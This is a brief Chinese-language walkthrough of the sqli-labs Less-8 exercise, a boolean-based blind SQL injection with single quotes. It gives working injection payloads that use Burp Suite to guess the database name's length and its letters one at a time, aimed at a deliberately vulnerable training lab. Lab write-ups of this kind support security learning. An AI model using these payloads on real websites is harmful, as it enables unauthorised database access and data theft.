一、Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)
1,观察index.php中$sql
2.burp拦截
3.repeater一下
4.先猜一下数据库长度,如果正确就会显示you are in
?id=1' and 8= (select length(database()))--+
5,再猜首字母,正确就显示you are in。可以将26个字母不断对半分来猜。后面的以此类推
?id=1' and 's' = (select substr(database(),1,1)) --+
还可以。。。
点开始攻击
第一个字母是s,以此类推